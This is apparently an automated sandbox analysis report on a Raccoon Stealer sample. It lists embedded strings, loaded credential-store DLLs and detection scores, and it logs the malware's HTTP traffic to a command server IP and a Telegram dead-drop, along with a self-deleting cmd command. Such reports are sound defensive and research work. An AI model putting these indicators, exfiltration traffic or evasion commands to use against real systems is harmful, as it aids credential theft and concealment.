Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://ocsp.accv.es0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qipcap.dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.0.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp, eLZzxG56uH.exe, 00000000.00000002.314058859.000000000168A000.00000004.00000020.sdmp	String found in binary or memory: https://t.me/tika31ramencomp
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: qipcap.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.p
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Posts data to webserver

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: t.me

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /tika31ramencomp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: eLZzxG56uH.exe, 00000000.00000002.314058859.000000000168A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

System Summary:

PE file contains section with special chars

Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co

Uses 32bit PE files

Source: eLZzxG56uH.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Detected potential crypto function

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F7819		0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E10B1		0_2_001E10B1
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F628C		0_2_001F628C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001EA2F9		0_2_001EA2F9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001FE2E4		0_2_001FE2E4
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F73C6		0_2_001F73C6
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DFD36		0_2_001DFD36
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E06DD		0_2_001E06DD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DE014		0_2_001DE014
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021D011		0_2_0021D011
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DE857		0_2_001DE857
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001D78B7		0_2_001D78B7
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020D298		0_2_0020D298
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DEBE9		0_2_001DEBE9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_002084BA		0_2_002084BA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A4BD		0_2_0021A4BD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020A480		0_2_0020A480
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020D4CA		0_2_0020D4CA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E2D2B		0_2_001E2D2B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A5DD		0_2_0021A5DD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00221E42		0_2_00221E42
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001EAE7B		0_2_001EAE7B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021DF29		0_2_0021DF29
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020D72F		0_2_0020D72F
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001D8F0B		0_2_001D8F0B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DD704		0_2_001DD704
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001FD757		0_2_001FD757

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: String function: 00227790 appears 125 times
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: String function: 0020F0F9 appears 75 times
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: String function: 00200940 appears 32 times

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FF3BE: DeviceIoControl,GetLastError,

0_2_001FF3BE

PE file does not import any functions

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: eLZzxG56uH.exe, 00000000.00000002.317170645.000000006EBFB000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs eLZzxG56uH.exe
Source: eLZzxG56uH.exe, 00000000.00000002.316712860.000000006EAC2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs eLZzxG56uH.exe

PE file contains strange resources

Source: eLZzxG56uH.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: pstorec.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mozglue.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wsock32.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: vcruntime140.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dbghelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: msvcp140.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmmbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmmbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmmbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior

PE file contains more sections than normal

Source: sqlite3.dll.0.dr

Static PE information: Number of sections : 18 > 10

Sample is known by Antivirus

Source: eLZzxG56uH.exe	Virustotal: Detection: 23%
Source: eLZzxG56uH.exe	ReversingLabs: Detection: 22%

Reads software policies

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\eLZzxG56uH.exe 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK			Jump to behavior

Creates files inside the user directory

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/68@1/2

Contains functionality to instantiate COM classes

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001EA224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

0_2_001EA224

SQL strings found in memory and binary data

Source: softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
